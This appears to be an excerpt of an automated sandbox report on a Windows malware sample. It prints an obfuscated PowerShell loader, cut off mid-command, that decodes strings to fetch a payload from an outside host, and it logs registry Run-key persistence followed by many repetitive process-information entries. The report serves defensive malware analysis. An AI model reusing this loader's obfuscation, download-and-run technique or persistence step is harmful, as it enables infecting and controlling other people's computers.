              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOr
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "echo $Enchodus;function Haggardly($Afhjlpningens){ .($Remittable) ($Afhjlpningens)} function Slappelse199($Refallen){$Tidsskriftssamlingens170=5;do{$Eight+=$Refallen[$Tidsskriftssamlingens170];$Tidsskriftssamlingens170+=6;$Nysgerrighederne=Format-List} until(!$Refallen[$Tidsskriftssamlingens170])$Eight}$Gildhall=Slappelse199 'theren coate OverTPudsi.flerdW';$Gildhall+=Slappelse199 'SygemeKarbob Kontc For lCopori EfteeArbejNFarest';$Horede=Slappelse199 'InforMDinaroNavnezGymnoiChinolae osl Foraa .kin/';$Gl=Slappelse199 'Me inTBjerglDe.ousI per1Inani2';$Belastedes=' Veks[Mon.snDiskoESpit,tPol,g.stenusUrinreNoncorOrd ivGrossIUtn ec AndeE mstP NedgOFunkti nekdnOut iTWitchmRigsga remiN SacrALamb g RensEBillirStivn] S,he:Dermo:.orbrsDecceE ukseC AfveUV nusRGeitjISeglet AmorYDialypSammeRDokumORudysTUnderoLysthcGui aOTo.dkLAnmrk=Omsme$UforsGCottaL';$Horede+=Slappelse199 ' C.pr5Calas.Tidta0Repas .nder(TermiWHaemoi UdkanG shidradero TranwDviguschart EnterNMath,TF rdo Kul.1Outpi0Feeds.salte0I dpr;S.ork AsylWOversiProduns,yat6 aadr4Under;k nst Guildx egrl6chivy4Rea e;gidse UndorSekvevHurtl:Datam1Nedgj3Pla o4Hexap.Pr du0Punkt)Sabel SnuppG,ttace SlutctnderkOmpr.oDambr/Dalze2Reneg0 Resk1 erio0Oldti0 hiro1Tasim0Domen1.epar scrapFDebowi Squar ZimmeSkubbfPreopoalexaxGalla/ apir1Autu 3Rumle4Safts.Un la0';$Taw=Slappelse199 'UntirUsemifsBe,deE Dekar Rntg-Gul.iATakeoG ncabe N.kvN Uddat';$Aktricens=Slappelse199 'ValerhGr ektOverftMbelppRigolsDyret:Quake/ Told/s.ingpAutoglKonj,aEventnSkvulaTruffcFiskehTerebi Hydre St kvCowpae Ro.krPosta.Do imaPooliu Oc t/G bioa OstedHemskmKamiki VarinJ.rds- Unshu,algss Overe.sperram,ia/PerioTF.gomeKrat lDen aeBajerfGaaseoBrugsn Sys.kMervrdabrete stearJe,as. Snk f Dis.l No.aa';$dipolen=Slappelse199 'Aliqu>';$Remittable=Slappelse199 'Enjoii uncoePomolX';$Sabirs='Ratsbanes';$Moos='\preconversion.Pri';Haggardly (Slappelse199 'Kasse$WarslGLsninLSa ssOSovepb l ndAImparLHuppe:UdfolpOve,ilBeskru BattmPolonBR.gefu,ostsm N,utS Just=Therm$Bat lE.nterndefunvAfske: I noASamk pSynkrpTre aDAuktiAOveriThumouaUndse+Exaes$ fdmpmP.mpeo winko reinS');Haggardly (Slappelse199 'sk fe$ ava gNonrelChab,oIndopBB.asfaformiLSvagh:Mutags ,owle ForsROligov g.ffI Mis.c De rERe onPShuntrSpindiNe raSGenhreP litR TegnNDovneED zinsUford=Dioxi$plainA,ormuk NovaTSkrueRMazi ISubstCBandoeBreddnNymphS tegn.BeboesHogfiPNovusLudaanIHonortPa ul(Unpro$ ,inudDartbICha,gP WingOYadeflBundlE Wo.lnDacry)');Haggardly (Slappelse199 $Belastedes);$Aktricens=$Serviceprisernes[0];$Nonmaritally=(Slappelse199 ' Besk$BoliggToi.elArmbaoSkralbB gloaHallolUnarb:S oftrSmagsE edstv Ru,eIQuartSEksisoToraeR RuteYSam.e= Tra,nAmir eUnderWPille-Hy,erORopanB Rmebj TuriEVacuuCEpit.Tpassa UsurSTundeYUnderScerebtGenerE,oncoMJocos.Resbo$TubicgKatacIBrevvLMarauDMotelhpuffeaCenteLSeriol');Haggardly ($Nonmaritally);Haggardly (Slappelse199 'Pir q$malloRAnomae priv yleniAlgr s FrucoSevilrOrganyK,nge.UnproHFreelePaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAD362C push esp; retf 2_2_00007FFC3DAD363A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAD52B3 push eax; ret 2_2_00007FFC3DAD52C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DBA44D6 push esi; retf 2_2_00007FFC3DBA44D7
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfbenytJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfbenytJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
